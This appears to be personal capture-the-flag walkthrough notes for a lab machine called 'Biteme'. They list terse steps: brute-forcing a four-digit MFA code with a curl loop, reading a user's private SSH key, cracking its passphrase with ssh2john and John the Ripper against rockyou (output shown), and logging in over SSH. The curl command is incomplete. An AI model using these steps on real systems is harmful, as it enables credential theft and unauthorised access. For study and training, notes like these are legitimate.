# Biteme


IP: 10.10.159.9


1. grab password via session hash
2. bruteforce MFA

`for i in {0000..9999}; do curl -X POST`


2. log in and grab the user's flag `/home/jason/user.txt`

3. grab jason's private ssh key
`/home/jason/.ssh/id_rsa`

4. decrypt with ssh2john `ssh2john id_rsa`
5. get password with johntheripper
```
# john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1a2b3c4d         (jason_id_rsa)     
1g 0:00:00:00 DONE (2022-03-16 13:06) 11.11g/s 56177p/s 56177c/s 56177C/s christina1..dominicana
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                     
```

6. log in with found passphrase
```
 ssh -i jason_id_rsa jason@10.10.159.9                                                                                  130 ⨯
Enter passphrase for key 'jason_id_rsa': 
Last login: Fri Mar  4 18:22:12 2022 from 10.0.2.2
jason@biteme:~$ 

```